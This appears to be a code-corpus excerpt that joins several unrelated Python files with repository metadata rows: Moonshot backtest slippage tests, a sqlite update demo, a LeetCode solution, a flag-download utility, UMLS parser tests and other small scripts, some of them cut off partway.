            master_fields = ["Timezone"]
            idx = pd.MultiIndex.from_product((master_fields, [dt_idx[0]]), names=["Field", "Date"])
            securities = pd.DataFrame(
                {
                    12345: [
                        "America/New_York"
                    ],
                    23456: [
                        "America/New_York"
                    ]
                },
                index=idx
            )
            return pd.concat((prices, securities))

        with patch("moonshot.strategies.base.get_historical_prices", new=mock_get_historical_prices):
            results = BuyBelow10ShortAbove10().backtest()

        self.assertSetEqual(
            set(results.index.get_level_values("Field")),
            {'Commission',
             'AbsExposure',
             'Signal',
             'Return',
             'Slippage',
             'NetExposure',
             'Trade',
             'AbsWeight',
             'Weight'}
        )

        # Round for stable comparison and replace NaN with a sentinel string.
        results = results.round(7)
        results = results.where(results.notnull(), "nan")

        signals = results.loc["Signal"].reset_index()
        signals.loc[:, "Date"] = signals.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            signals.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [1.0,
                     -1.0,
                     -1.0,
                     1.0],
             23456: [1.0,
                     -1.0,
                     1.0,
                     -1.0]}
        )

        weights = results.loc["Weight"].reset_index()
        weights.loc[:, "Date"] = weights.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            weights.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.5,
                     -0.5,
                     -0.5,
                     0.5],
             23456: [0.5,
                     -0.5,
                     0.5,
                     -0.5]}
        )

        net_exposures = results.loc["NetExposure"].reset_index()
        net_exposures.loc[:, "Date"] = net_exposures.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            net_exposures.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: ["nan",
                     0.5,
                     -0.5,
                     -0.5],
             23456: ["nan",
                     0.5,
                     -0.5,
                     0.5]}
        )

        trades = results.loc["Trade"].reset_index()
        trades.loc[:, "Date"] = trades.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            trades.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: ["nan",
                     0.5,
                     -1.0,
                     0.0],
             23456: ["nan",
                     0.5,
                     -1.0,
                     1.0]}
        )

        # Slippage = SLIPPAGE_BPS (20 bps = 0.002) * abs(trade): a 0.5 trade
        # costs 0.001, a full reversal of 1.0 costs 0.002.
        slippage = results.loc["Slippage"].reset_index()
        slippage.loc[:, "Date"] = slippage.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            slippage.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.0,
                     0.001,
                     0.002,
                     0.0],
             23456: [0.0,
                     0.001,
                     0.002,
                     0.002]}
        )

        # Returns are price change times prior exposure, minus the slippage
        # charged that period (calculations shown inline).
        returns = results.loc["Return"]
        returns = returns.reset_index()
        returns.loc[:, "Date"] = returns.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            returns.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.0,
                     -0.001,
                     -0.0247273, # (10.50 - 11)/11 * 0.5 - 0.002
                     0.0242857], # (9.99 - 10.50)/10.50 * -0.5
             23456: [0.0,
                     -0.001,
                     -0.1156364, # (8.50 - 11)/11 * 0.5 - 0.002
                     -0.1196471] # (10.50 - 8.50)/8.50 * -0.5 - 0.002
             }
        )
    def test_apply_mulitple_slippages(self):
        """
        Tests that the resulting DataFrames are correct when multiple
        slippage classes and SLIPPAGE_BPS are applied.

        NOTE(review): "mulitple" in the method name is a typo for
        "multiple"; kept as-is so test selection by name keeps working.
        """
        # Two fixed-slippage classes combined with SLIPPAGE_BPS = 50 give a
        # total one-way slippage of 30 + 20 + 50 = 100 bps, i.e. 0.01 per
        # unit of turnover. The expected Slippage/Return values below are
        # derived from that 0.01 figure.
        class TestSlippage1(FixedSlippage):
            ONE_WAY_SLIPPAGE = 0.003 # 30 BPS
        class TestSlippage2(FixedSlippage):
            ONE_WAY_SLIPPAGE = 0.002 # 20 BPS
        class BuyBelow10ShortAbove10(Moonshot):
            """
            A basic test strategy that buys below 10 and shorts above 10.
            """
            SLIPPAGE_CLASSES = (TestSlippage1, TestSlippage2)
            SLIPPAGE_BPS = 50
            def prices_to_signals(self, prices):
                # +1 where close <= 10, -1 where close > 10
                long_signals = prices.loc["Close"] <= 10
                short_signals = prices.loc["Close"] > 10
                signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
                return signals
        def mock_get_historical_prices(*args, **kwargs):
            # Canned four-session Close/Volume history for two securities,
            # plus a one-row securities master (Timezone only).
            dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02","2018-05-03", "2018-05-04"])
            fields = ["Close","Volume"]
            idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
            prices = pd.DataFrame(
                {
                    12345: [
                        # Close
                        9,
                        11,
                        10.50,
                        9.99,
                        # Volume
                        5000,
                        16000,
                        8800,
                        9900
                    ],
                    23456: [
                        # Close
                        9.89,
                        11,
                        8.50,
                        10.50,
                        # Volume
                        15000,
                        14000,
                        28800,
                        17000
                    ],
                },
                index=idx
            )
            master_fields = ["Timezone"]
            idx = pd.MultiIndex.from_product((master_fields, [dt_idx[0]]), names=["Field", "Date"])
            securities = pd.DataFrame(
                {
                    12345: [
                        "America/New_York"
                    ],
                    23456: [
                        "America/New_York"
                    ]
                },
                index=idx
            )
            return pd.concat((prices, securities))
        with patch("moonshot.strategies.base.get_historical_prices", new=mock_get_historical_prices):
            results = BuyBelow10ShortAbove10().backtest()
        self.assertSetEqual(
            set(results.index.get_level_values("Field")),
            {'Commission',
             'AbsExposure',
             'Signal',
             'Return',
             'Slippage',
             'NetExposure',
             'Trade',
             'AbsWeight',
             'Weight'}
        )
        # Round for stable float comparison, and stringify NaNs so the
        # dict comparisons below can match them exactly.
        results = results.round(7)
        results = results.where(results.notnull(), "nan")
        signals = results.loc["Signal"].reset_index()
        signals.loc[:, "Date"] = signals.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            signals.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [1.0,
                     -1.0,
                     -1.0,
                     1.0],
             23456: [1.0,
                     -1.0,
                     1.0,
                     -1.0]}
        )
        weights = results.loc["Weight"].reset_index()
        weights.loc[:, "Date"] = weights.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            weights.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.5,
                     -0.5,
                     -0.5,
                     0.5],
             23456: [0.5,
                     -0.5,
                     0.5,
                     -0.5]}
        )
        net_exposures = results.loc["NetExposure"].reset_index()
        net_exposures.loc[:, "Date"] = net_exposures.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            net_exposures.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: ["nan",
                     0.5,
                     -0.5,
                     -0.5],
             23456: ["nan",
                     0.5,
                     -0.5,
                     0.5]}
        )
        trades = results.loc["Trade"].reset_index()
        trades.loc[:, "Date"] = trades.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            trades.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: ["nan",
                     0.5,
                     -1.0,
                     0.0],
             23456: ["nan",
                     0.5,
                     -1.0,
                     1.0]}
        )
        # Slippage = abs(Trade) * 0.01 (100 bps total one-way slippage).
        slippage = results.loc["Slippage"].reset_index()
        slippage.loc[:, "Date"] = slippage.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            slippage.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.0,
                     0.005,
                     0.01,
                     0.0],
             23456: [0.0,
                     0.005,
                     0.01,
                     0.01]}
        )
        returns = results.loc["Return"]
        returns = returns.reset_index()
        returns.loc[:, "Date"] = returns.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            returns.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.0,
                     -0.005,
                     -0.0327273, # (10.50 - 11)/11 * 0.5 - 0.01
                     0.0242857], # (9.99 - 10.50)/10.50 * -0.5
             23456: [0.0,
                     -0.005,
                     -0.1236364, # (8.50 - 11)/11 * 0.5 - 0.01
                     -0.1276471] # (10.50 - 8.50)/8.50 * -0.5 - 0.01
             }
        )
| [
"brian@quantrocket.com"
] | brian@quantrocket.com |
0ec0747aea6f065bfb873f5d9291c4687494bf7b | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project2/Project2/.history/blog/views_20211114183757.py | 5bdf30cc1996d4f9f8116bb63430e3540af0ba18 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 212 | py | from django.shortcuts import render, get_object_or_404
from .models import Blog
from django.views import generic
# Create your views here.
class BlogList(generic.ListView):
queryset = Blog.objects.filter(st) | [
"phanthituyngoc1995@gmail.com"
] | phanthituyngoc1995@gmail.com |
2a75f41f27e37ffea0a9f08cd9194e665ffb1f11 | fcbedcc2f7483a4b3ce9111c9c889bd4a5079496 | /sql/sqlg.py | 899817382ff5aeea50f67d3d8c32f2d871fad008 | [] | no_license | kevlab/RealPython2 | aab94de91d0824290bfce4a318f57f4fe5282f19 | a85f92563b414830431a79d2448682da0c12d645 | refs/heads/master | 2021-01-10T19:10:46.035344 | 2015-05-27T02:24:48 | 2015-05-27T02:24:48 | 31,555,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | # UPDATE and DELETE statements
import sqlite3
# NOTE: this is Python 2 code (print statement syntax below).
# Used as a context manager, the sqlite3 connection commits on success and
# rolls back on exception; it is NOT closed automatically on exit.
with sqlite3.connect('new.db') as connection:
    c = connection.cursor()
    # update one row, matching on the city column
    c.execute("""UPDATE population SET population = 9000000 WHERE
        city ='New York City'""")
    # delete one row, matching on the city column
    c.execute("DELETE FROM population WHERE city='Boston'")
    print "\nNEW DATA:\n"
    c.execute("SELECT * FROM population")
    rows = c.fetchall()
    for r in rows:
        # prints the first three columns of each row; exact schema of the
        # `population` table is not shown here — confirm before extending
        print r[0], r[1], r[2]
| [
"greenleaf1348@gmail.com"
] | greenleaf1348@gmail.com |
84e69319d015573313a7536fe6d36c82f50e5297 | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/leetcode/LeetcodePythonProject/leetcode_0001_0050/LeetCode003_LongestSubstingWithoutRepeatingCharacters.py | 7161fed14178c544c2c29ac5762c77a963af8832 | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 828 | py | '''
Created on May 5, 2017
@author: MT
'''
class Solution(object):
    def lengthOfLongestSubstring(self, s):
        """Return the length of the longest substring of ``s`` that has no
        repeating characters.

        Sliding-window approach: ``window`` holds the characters currently
        inside ``s[start:i+1]``; on a duplicate, the left edge advances
        until the duplicate is evicted. O(n) time, O(k) space where k is
        the alphabet size.
        """
        window = set()
        start = 0
        best = 0
        for i, ch in enumerate(s):
            # Shrink from the left until ch can join the window.
            while start < i and ch in window:
                window.discard(s[start])
                start += 1
            window.add(ch)
            best = max(best, i - start + 1)
        return best

    def test(self):
        """Print results for a few sample inputs."""
        testCases = [
            'abc',
            'bbbb',
            'abcdba',
        ]
        for s in testCases:
            print('s: %s' % s)
            result = self.lengthOfLongestSubstring(s)
            print('result: %s' % result)
            print('-='*30+'-')


if __name__ == '__main__':
    Solution().test()
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
b55e6344c718b94dc01be9ce249c8634c25f9516 | 7fbb4f70493a27d2b0fe2c107a1055e493bf7188 | /taobao-tianmao/top/api/rest/TmallExchangeMessagesGetRequest.py | 67817273e9db4bf66611b203f8cb229606beb032 | [
"Apache-2.0"
] | permissive | ScottLeeF/python-example | da9d78a85cce914153f1c5ad662d28cddde0fc0f | 0b230ba80fe5020d70329a9d73e058013f0ca111 | refs/heads/master | 2022-12-03T00:24:47.035304 | 2020-04-21T09:51:12 | 2020-04-21T09:51:12 | 242,459,649 | 0 | 0 | Apache-2.0 | 2022-11-22T05:29:21 | 2020-02-23T05:03:19 | Python | UTF-8 | Python | false | false | 471 | py | '''
Created by auto_sdk on 2018.08.09
'''
from top.api.base import RestApi
class TmallExchangeMessagesGetRequest(RestApi):
  """Auto-generated TOP request wrapper for ``tmall.exchange.messages.get``.

  Each attribute assigned in ``__init__`` is a request parameter; values
  left as ``None`` are presumably omitted from the request by the
  ``RestApi`` base class (serialization happens there, not here).
  """
  def __init__(self, domain='gw.api.taobao.com', port=80):
    RestApi.__init__(self, domain, port)
    # Request parameters (names mirror the TOP API's parameter names).
    self.dispute_id = None
    self.fields = None
    self.operator_roles = None
    self.page_no = None
    self.page_size = None
  def getapiname(self):
    # API method name used by the TOP gateway to route this request.
    return 'tmall.exchange.messages.get'
| [
"fei.li@tuanche.com"
] | fei.li@tuanche.com |
46e5affa680c2833075c70e0956b9914e2f798ce | 8c4cd2a8725f8f04e5b2fee3bc8f67fb7b4af446 | /benchmarks/benchmark_dual_dmp.py | 9369f7b297cea7f2ea2c075f8b349b3127e99a0d | [
"BSD-3-Clause"
] | permissive | dfki-ric/movement_primitives | 37c08aade84f5abc4248b7281e6a1c441cf642a9 | 327b192608747e20e555f59671903854045c4713 | refs/heads/main | 2023-07-20T07:57:52.938054 | 2023-05-22T13:10:47 | 2023-05-22T13:10:47 | 429,049,411 | 97 | 29 | NOASSERTION | 2023-07-18T08:58:30 | 2021-11-17T13:06:49 | Python | UTF-8 | Python | false | false | 881 | py | from functools import partial
import numpy as np
from movement_primitives.dmp import DualCartesianDMP
import timeit
# Benchmark: time DualCartesianDMP.open_loop with the Cython step function
# vs. the pure-Python step function on a randomly weighted dual-arm DMP.
# start_y/goal_y are 14-dimensional states — presumably two stacked 7D
# poses (position + quaternion) per arm; confirm against DualCartesianDMP.
start_y = np.array([0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0])
goal_y = np.array([1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0])
dt = 0.01       # trajectory sampling step
int_dt = 0.001  # internal integration step
dmp = DualCartesianDMP(execution_time=1.0, dt=dt, n_weights_per_dim=6, int_dt=int_dt)
dmp.configure(start_y=start_y, goal_y=goal_y)
# NOTE(review): np.random is unseeded, so the weights differ between runs.
dmp.set_weights(1000 * np.random.randn(*dmp.get_weights().shape))
# repeat=10, number=1: ten independent single-run timings per variant.
times = timeit.repeat(partial(dmp.open_loop, step_function="cython"), repeat=10, number=1)
print("Cython")
print("Mean: %.5f; Std. dev.: %.5f" % (np.mean(times), np.std(times)))
times = timeit.repeat(partial(dmp.open_loop, step_function="python"), repeat=10, number=1)
print("Python")
print("Mean: %.5f; Std. dev.: %.5f" % (np.mean(times), np.std(times)))
| [
"afabisch@googlemail.com"
] | afabisch@googlemail.com |
69dcf77fe8c8f4bf7999ba12fd6efc072ff19e6a | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /servicecatalog_read/provisioned-product-output_get.py | 01fe1a4ce4eb011dd07c8fc189e38f995cc52cf0 | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import read_no_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/servicecatalog/get-provisioned-product-outputs.html
if __name__ == '__main__':
    """
    """
    # Options passed to the shared `read_no_parameter` helper, which wraps
    # `aws servicecatalog get-provisioned-product-outputs`; left empty here
    # (see the commented examples below for how to populate it).
    add_option_dict = {}
    #######################################################################
    # setting option use
    # ex: add_option_dict["setting_matching_parameter"] = "--owners"
    # ex: add_option_dict["setting_key"] = "owner_id"
    #######################################################################
    # single parameter
    # ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
    read_no_parameter("servicecatalog", "get-provisioned-product-outputs", add_option_dict)
"hcseo77@gmail.com"
] | hcseo77@gmail.com |
c934f71b537bf189c6aefbe18b994545c9942e1c | 04401ec5768d909ef95b3021dd39d280cdac7356 | /flags/flags2_common.py | 5a073a5e08ad15b91c298578cf78dbcec4edf52c | [
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | pythonfluente/concorrencia2020 | 82f826fbcfc36c41cda251cbeaf370a6822b3cdf | 62b1f506fd69b77b67a20aedf6b204f543912c82 | refs/heads/master | 2021-04-03T12:32:48.565498 | 2020-12-20T01:03:20 | 2020-12-20T01:03:20 | 248,353,395 | 7 | 7 | BSD-3-Clause | 2020-04-21T14:28:29 | 2020-03-18T22:06:21 | Python | UTF-8 | Python | false | false | 5,097 | py | """Utilities for second set of flag examples.
"""
import os
import time
import sys
import string
import argparse
from collections import namedtuple
from enum import Enum
# (status, data) pair produced for every attempted download.
Result = namedtuple('Result', 'status data')

# Outcome classification for one download attempt.
HTTPStatus = Enum('Status', 'ok not_found error')

# Top-20 countries by population, as ISO 3166 alpha-2 codes.
POP20_CC = ('CN IN US ID BR PK NG BD RU JP '
            'MX PH VN ET EG DE IR TR CD FR').split()

# Conservative concurrency defaults; callers of main() pass their own.
DEFAULT_CONCUR_REQ = 1
MAX_CONCUR_REQ = 1

# Server labels selectable via --server (see process_args).
SERVERS = {
    'REMOTE': 'http://flupy.org/data/flags',
    'LOCAL': 'http://localhost:8001/flags',
    'DELAY': 'http://localhost:8002/flags',
    'ERROR': 'http://localhost:8003/flags',
}
DEFAULT_SERVER = 'LOCAL'

# Directory where save_flag() writes images (must exist — not created here).
DEST_DIR = 'downloaded/'
# Whitespace-separated country codes, read by expand_cc_args(all_cc=True).
COUNTRY_CODES_FILE = 'country_codes.txt'
def save_flag(img, filename):
    """Write the raw image bytes *img* into DEST_DIR under *filename*."""
    with open(os.path.join(DEST_DIR, filename), 'wb') as fp:
        fp.write(img)
def initial_report(cc_list, actual_req, server_label):
    """Print a summary of the download run about to start."""
    count = len(cc_list)
    # Short lists are shown in full; long lists only by their endpoints.
    if count <= 10:
        summary = ', '.join(cc_list)
    else:
        summary = f'from {cc_list[0]} to {cc_list[-1]}'
    print(f'{server_label} site: {SERVERS[server_label]}')
    print(f'Searching for {count} flag{"s" if count != 1 else ""}: {summary}')
    print(f'{actual_req} concurrent connection'
          f'{"s" if actual_req != 1 else ""} will be used.')
def final_report(cc_list, counter, start_time):
    """Print download totals per status and elapsed wall-clock time."""
    elapsed = time.time() - start_time
    print('-' * 20)
    ok_count = counter[HTTPStatus.ok]
    print(f'{ok_count} flag{"s" if ok_count != 1 else ""} downloaded.')
    missing = counter[HTTPStatus.not_found]
    if missing:
        print(missing, 'not found.')
    errors = counter[HTTPStatus.error]
    if errors:
        print(f'{errors} error{"s" if errors != 1 else ""}.')
    print(f'Elapsed time: {elapsed:.2f}s')
def expand_cc_args(every_cc, all_cc, cc_args, limit):
    """Expand the command-line country-code arguments into a sorted list.

    * every_cc: all 676 two-letter combinations AA..ZZ.
    * all_cc:   codes read from COUNTRY_CODES_FILE.
    * otherwise each argument is a single letter (expanded to that letter
      plus A..Z) or a two-letter code; anything else raises ValueError.

    At most *limit* codes are returned.
    """
    letters = string.ascii_uppercase
    codes = set()
    if every_cc:
        codes.update(first + second
                     for first in letters for second in letters)
    elif all_cc:
        with open(COUNTRY_CODES_FILE) as fp:
            codes.update(fp.read().split())
    else:
        for arg in cc_args:
            cc = arg.upper()
            if len(cc) == 1 and cc in letters:
                codes.update(cc + letter for letter in letters)
            elif len(cc) == 2 and all(ch in letters for ch in cc):
                codes.add(cc)
            else:
                raise ValueError('*** Usage error: '
                                 'each CC argument must be A to Z or AA to ZZ.')
    return sorted(codes)[:limit]
def process_args(default_concur_req):
    """Parse the command line and expand the country-code arguments.

    Returns an ``(args, cc_list)`` tuple. On any invalid option
    combination, prints a usage error and exits with status 1.
    """
    server_options = ', '.join(sorted(SERVERS))
    parser = argparse.ArgumentParser(
                description='Download flags for country codes. '
                'Default: top 20 countries by population.')
    parser.add_argument('cc', metavar='CC', nargs='*',
                help='country code or 1st letter (eg. B for BA...BZ)')
    parser.add_argument('-a', '--all', action='store_true',
                help='get all available flags (AD to ZW)')
    parser.add_argument('-e', '--every', action='store_true',
                help='get flags for every possible code (AA...ZZ)')
    parser.add_argument('-l', '--limit', metavar='N', type=int,
                help='limit to N first codes', default=sys.maxsize)
    parser.add_argument('-m', '--max_req', metavar='CONCURRENT', type=int,
                default=default_concur_req,
                help=f'maximum concurrent requests (default={default_concur_req})')
    parser.add_argument('-s', '--server', metavar='LABEL',
                default=DEFAULT_SERVER,
                help=f'server to hit: one of {server_options} (default={DEFAULT_SERVER})')
    parser.add_argument('-v', '--verbose', action='store_true',
                help='output detailed progress info')
    args = parser.parse_args()
    # Validate numeric options before doing any work.
    if args.max_req < 1:
        print('*** Usage error: --max_req CONCURRENT must be >= 1')
        parser.print_usage()
        sys.exit(1)
    if args.limit < 1:
        print('*** Usage error: --limit N must be >= 1')
        parser.print_usage()
        sys.exit(1)
    # Server labels are case-insensitive on input but stored uppercased.
    args.server = args.server.upper()
    if args.server not in SERVERS:
        print('*** Usage error: --server LABEL must be one of',
              server_options)
        parser.print_usage()
        sys.exit(1)
    try:
        cc_list = expand_cc_args(args.every, args.all, args.cc, args.limit)
    except ValueError as exc:
        print(exc.args[0])
        parser.print_usage()
        sys.exit(1)
    if not cc_list:
        # No codes requested: fall back to the top-20-by-population list.
        cc_list = sorted(POP20_CC)
    return args, cc_list
def main(download_many, default_concur_req, max_concur_req):
    """Drive one download run: parse args, download, report.

    *download_many* is the concrete (sequential/threaded/async)
    implementation; it must return a Counter keyed by HTTPStatus.
    """
    args, cc_list = process_args(default_concur_req)
    # Never use more connections than requested, allowed, or needed.
    actual_req = min(args.max_req, max_concur_req, len(cc_list))
    initial_report(cc_list, actual_req, args.server)
    base_url = SERVERS[args.server]
    start_time = time.time()
    counter = download_many(cc_list, base_url, args.verbose, actual_req)
    total = sum(counter.values())
    assert total == len(cc_list), 'some downloads are unaccounted for'
    final_report(cc_list, counter, start_time)
| [
"luciano@ramalho.org"
] | luciano@ramalho.org |
1dc8801b64037a4f969242a0a4870dc67f6ad153 | e43f0e33bc07f9c8866dd7db88c80576e5d3d9c3 | /tests/parsers_umls_test.py | d55f67cd98b4b5d8af0fb0904f95307780051333 | [] | no_license | bearnd/mt-ingester | ef5fc47d57d4bade7ce76f303425f861f74c00d8 | cc4503b715d862af0ec82fdea666386e9265e56e | refs/heads/master | 2023-03-08T10:54:22.682969 | 2019-09-14T13:45:26 | 2019-09-14T13:45:26 | 338,612,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,301 | py | # coding=utf-8
import os
import unittest
from mt_ingester.parsers import ParserUmlsSat
from mt_ingester.parsers import ParserUmlsConso
from mt_ingester.parsers import ParserUmlsDef
from tests.assets.samples_umls import get_sample_file
from tests.assets.samples_umls import EnumUmlsFileSample
class ParserUmlsSatTest(unittest.TestCase):
    """ Tests the `ParserUmlsSat` class."""

    def setUp(self):
        """ Retrieves a sample MRSAT.RRF file and instantiates the parser."""
        # `get_sample_file` yields a temp-file object; only its `.name`
        # (the path) is handed to the parser.
        self.file = get_sample_file(umls_file_type=EnumUmlsFileSample.MRSAT)
        self.parser = ParserUmlsSat()

    def tearDown(self):
        """ Deletes the temporary MRSAT.RRF file."""
        os.remove(self.file.name)

    def test_parse(self):
        """ Tests the `parse` method of the parser class."""
        # Expected: a map of UMLS concept IDs (CUIs) to MeSH descriptor
        # IDs (DUIs) extracted from the sample MRSAT.RRF.
        map_cui_dui = self.parser.parse(filename_mrsat_rrf=self.file.name)
        self.assertDictEqual(
            map_cui_dui,
            {
                'C0001175': 'D000163',
                'C0006118': 'D001932',
                'C0024537': 'D016780',
                'C0153633': 'D001932',
                'C0750974': 'D001932',
                'C0750979': 'D001932',
                'C1527390': 'D001932',
            }
        )
class ParserUmlsConsoTest(unittest.TestCase):
    """ Tests the `ParserUmlsConso` class."""

    def setUp(self):
        """ Retrieves sample MRSAT.RRF and MRCONSO.RRF files and instantiates
            the parser.
        """
        self.file_mrsat = get_sample_file(
            umls_file_type=EnumUmlsFileSample.MRSAT,
        )
        self.file_mrconso = get_sample_file(
            umls_file_type=EnumUmlsFileSample.MRCONSO,
        )
        self.parser = ParserUmlsConso()

    def tearDown(self):
        """ Deletes the temporary MRSAT.RRF and MRCONSO.RRF files."""
        os.remove(self.file_mrsat.name)
        os.remove(self.file_mrconso.name)

    def test_parse(self):
        """ Tests the `parse` method of the parser class."""
        # Expected: MeSH descriptor ID (DUI) -> collection of synonyms.
        dui_synonyms = self.parser.parse(
            filename_mrsat_rrf=self.file_mrsat.name,
            filename_mrconso_rrf=self.file_mrconso.name,
        )
        dui_synonyms_refr = {
            'D000163': [
                'acquired immunodeficiency syndrome',
                'acquired immunodeficiency syndromes',
                'syndromes, acquired immunodeficiency',
            ],
            'D001932': [
                'neoplasm, brain',
                'brain tumors',
                'brain tumors, primary',
                'neoplasms, intracranial',
            ],
            'D016780': [
                'plasmodium vivax malaria',
                'vivax malaria',
            ]
        }
        # Compare keys first, then each synonym list order-insensitively.
        self.assertListEqual(
            sorted(list(dui_synonyms.keys())),
            sorted(list(dui_synonyms_refr.keys())),
        )
        for k, v in dui_synonyms_refr.items():
            self.assertListEqual(
                sorted(list(dui_synonyms[k])),
                sorted(list(dui_synonyms_refr[k])),
            )
class ParserUmlsDefTest(unittest.TestCase):
    """ Tests the `ParserUmlsDef` class."""

    def setUp(self):
        """ Retrieves sample MRSAT.RRF and MRDEF.RRF files and instantiates
            the parser.
        """
        self.file_mrsat = get_sample_file(
            umls_file_type=EnumUmlsFileSample.MRSAT,
        )
        self.file_mrdef = get_sample_file(
            umls_file_type=EnumUmlsFileSample.MRDEF,
        )
        self.parser = ParserUmlsDef()

    def tearDown(self):
        """ Deletes the temporary MRSAT.RRF and MRDEF.RRF files."""
        os.remove(self.file_mrsat.name)
        os.remove(self.file_mrdef.name)

    def test_parse(self):
        """ Tests the `parse` method of the parser class."""
        # Expected: MeSH descriptor ID (DUI) -> {source vocabulary ->
        # list of definitions} as extracted from the sample MRDEF.RRF.
        dui_definitions = self.parser.parse(
            filename_mrsat_rrf=self.file_mrsat.name,
            filename_mrdef_rrf=self.file_mrdef.name,
        )
        dui_definitions_refr = {
            'D000163': {
                'CSP': [
                    ('one or more indicator diseases, depending on '
                     'laboratory evidence of HIV infection (CDC); late '
                     'phase of HIV infection characterized by marked '
                     'suppression of immune function resulting in '
                     'opportunistic infections, neoplasms, and other systemic '
                     'symptoms (NIAID).')
                ],
                'NCI_NICHD': [
                    ('A chronic, potentially life threatening condition that '
                     'is caused by human immunodeficiency virus (HIV) '
                     'infection, and is characterized by increased '
                     'susceptibility to opportunistic infections, certain '
                     'cancers and neurologic disorders.')
                ]
            },
            'D001932': {
                'NCI': [
                    ('A benign or malignant neoplasm that arises from or '
                     'metastasizes to the brain.')
                ],
                'NCI_NICHD': [
                    'An abnormal intracranial solid mass or growth.'
                ]
            },
            'D016780': {
                'MSH': [
                    ('Malaria caused by PLASMODIUM VIVAX. This form of '
                     'malaria is less severe than MALARIA, FALCIPARUM, but '
                     'there is a higher probability for relapses to occur. '
